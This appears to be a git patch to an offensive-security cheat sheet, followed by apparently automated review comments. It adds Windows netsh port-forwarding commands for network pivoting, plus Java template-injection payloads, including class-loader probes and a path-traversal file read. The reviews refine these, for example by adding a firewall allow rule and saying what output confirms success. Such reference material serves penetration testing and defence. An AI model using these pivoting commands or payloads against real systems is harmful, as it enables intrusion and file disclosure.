From a7439d812de5d848a4e9f19525fbf2d6977607d6 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sat, 9 Jun 2018 18:56:19 +0200 Subject: [PATCH] Windows port forwarding - Netsh --- .../Network Pivoting Techniques.md | 19 ++++++++++++++++--- Server Side Template injections/README.md | 5 +++++ 2 files changed, 21 insertions(+), 3 deletions(-) diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index b0e45ea..0c44974 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -1,9 +1,21 @@ # Network Pivoting Techniques +## Windows netsh Port Forwarding +```powershell +netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport + +netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110 +``` +1. listenaddress – is a local IP address waiting for a connection. +2. listenport – local listening TCP port (the connection is waited on it). +3. connectaddress – is a local or remote IP address (or DNS name) to which the incoming connection will be redirected. +4. connectport – is a TCP port to which the connection from listenport is forwarded to. + + ## SSH ### SOCKS Proxy -``` +```bash ssh -D8080 [user]@[host] ssh -N -f -D 9000 [user]@[host] @@ -12,13 +24,13 @@ ssh -N -f -D 9000 [user]@[host] ``` ### Local Port Forwarding -``` +```bash ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host] ``` ### Remote Port Forwarding -``` +```bash ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host] ``` 
@@ -98,3 +110,4 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro ## Thanks to * [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/) + * [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/) diff --git a/Server Side Template injections/README.md b/Server Side Template injections/README.md index b04d559..46ffe66 100644 --- a/Server Side Template injections/README.md +++ b/Server Side Template injections/README.md @@ -24,7 +24,11 @@ e.g: ## Java ### Basic injection ```java +${7*7} ${{7*7}} +${class.getClassLoader()} +${class.getResource("").getPath()} +${class.getResource("../../../../../index.htm").getContent()} ``` ### Retrieve the system’s environment variables. @@ -176,3 +180,4 @@ Inject this template * [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/) * [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98) * [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf) + * [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/)
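Review bot: In the first hunk of Network Pivoting Techniques.md, the worked netsh example does not actually pivot: `listenaddress=10.1.1.110` and `connectaddress=10.1.1.110` are the same host, so the rule only remaps 3340 to 3389 locally. For a pivoting cheat sheet the example should make `connectaddress` an internal host reachable only from the compromised box (for example a second NIC's subnet) so the reader sees the traversal. The section also documents only `add`; a tester needs the rest of the lifecycle to audit and clean up: `netsh interface portproxy show all` to list rules, `netsh interface portproxy delete v4tov4 listenport=3340 listenaddress=10.1.1.110` to remove one, and `netsh interface portproxy reset` to drop all of them. Worth stating the preconditions too: the command needs an elevated prompt, the IP Helper service (iphlpsvc) must be running for portproxy to forward anything, and Windows Firewall blocks the new listen port until an inbound allow rule exists (for example `netsh advfirewall firewall add rule name="portproxy 3340" protocol=TCP dir=in localport=3340 action=allow`). Minor: the fence is tagged `powershell` although these are plain netsh invocations that work identically from cmd.exe, and the later hunks in the same file switch the SSH fences to `bash`; pick one convention.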
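Review bot: In the Server Side Template injections/README.md hunk under "Java / Basic injection", the four added payloads are engine-specific but carry no indication of which engine each targets; "Java" is not one template language, and `${7*7}` behaves differently across Freemarker, Velocity, Thymeleaf and plain Expression Language. The `${class.getClassLoader()}` and `${class.getResource(...)}` lines come from the VelocityServlet / EL writeup added in the last hunk, so label them as such next to the payload, and separate the detection probe (`${7*7}` rendering as `49`) from the exploitation payloads that follow it. Two caveats a reader will hit: the traversal depth in `../../../../../index.htm` depends on the deployment layout and will need adjusting, and `URL.getContent()` returns an Object (an `InputStream` for `file:` URLs), so a rendered template shows an object reference, not the file body; say what output confirms success so the tester does not discard a working injection.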
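Review bot: In the final hunk of Server Side Template injections/README.md, the new VelocityServlet reference is appended to the list but nothing in the body cites it, so a reader cannot tell which payloads it backs; add a short pointer to it beside the `${class.getResource...}` entries it was taken from. Same applies to the woshub link added to the "Thanks to" list of Network Pivoting Techniques.md, which should be referenced from the new netsh section (and can use https, since the site serves it).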